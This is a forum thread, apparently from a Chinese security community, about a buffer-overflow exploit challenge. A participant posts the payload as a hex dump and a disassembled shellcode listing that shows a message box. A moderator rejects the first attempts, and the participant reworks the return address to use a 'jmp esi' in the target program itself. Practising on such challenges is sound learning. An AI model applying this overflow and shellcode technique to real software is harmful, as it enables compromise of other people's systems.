能力值:
( LV4,RANK:50 )
|
-
-
2 楼
原来是大写的,还有个感叹号 :(
改三个字节就行了。
|
能力值:
( LV4,RANK:50 )
|
-
-
3 楼
其实第二次提交和第一次原理一样的:
Offset 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
00000000 B5 33 00 00 99 14 00 00 4F 4B 21 00 00 00 00 00 µ3..™...OK!.....
00000016 83 EC 2C 6A 00 8D 44 24 04 50 50 6A 00 E8 F8 09 ƒì,j.D$.PPj.èø.
00000032 32 7E 83 C4 4C 5D C3 00 00 00 00 00 00 00 00 00 2~ƒÄL]Ã.........
00000048 80 FB 12 00 €û..
偏移 8,9,10 处是 "ok" 字符串,第一次提交写的是小写,第二次改成大写,后面加了个
感叹号 (0x21).
|
能力值:
( LV4,RANK:50 )
|
-
-
4 楼
溢出后返回到堆栈一个地址。这个地址我是硬编码进去的,希望在其它机器上这个值一样。
|
能力值:
( LV4,RANK:50 )
|
-
-
5 楼
溢出后返回到的地址:12FB80
ShellCode 代码:
0012FB80 83EC 2C SUB ESP,2C
0012FB83 6A 00 PUSH 0
0012FB85 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4]
0012FB89 50 PUSH EAX
0012FB8A 50 PUSH EAX
0012FB8B 6A 00 PUSH 0
0012FB8D E8 F809327E CALL USER32.MessageBoxA
0012FB92 83C4 4C ADD ESP,4C
0012FB95 5D POP EBP
0012FB96 C3 RETN
|
能力值:
(RANK:350 )
|
-
-
6 楼
单击按钮后,直接崩溃
|
能力值:
( LV4,RANK:50 )
|
-
-
7 楼
还能再提交吗? 最后一次,没其它环境测试。
|
能力值:
(RANK:350 )
|
-
-
8 楼
还是没通过,直接崩溃。
你思路有问题,这题可以做到与系统无关的。
|
能力值:
( LV4,RANK:50 )
|
-
-
9 楼
我知道了。我选择了 kernel32.dll 中的 jmp esi. 应该选择 ExploitMe.exe 里的
jmp esi.
算了,已经满两次了。
|
能力值:
(RANK:350 )
|
-
-
10 楼
你可能没细看规则,附件可以允许多次提交的,只是每提交一次,减5分。
|
能力值:
( LV4,RANK:50 )
|
-
-
11 楼
哦.理解错了.我以为只能两次.
再次提交. 这个应该正常,且可以反复溢出.
|
能力值:
(RANK:570 )
|
-
-
12 楼
验证通过~~
|
能力值:
( LV4,RANK:50 )
|
-
-
13 楼
总算过了. Thanks~~
受益非浅. 期待后面的题目更精彩
|
能力值:
(RANK:570 )
|
-
-
14 楼
123.1518639034595146348511616371
|
|
|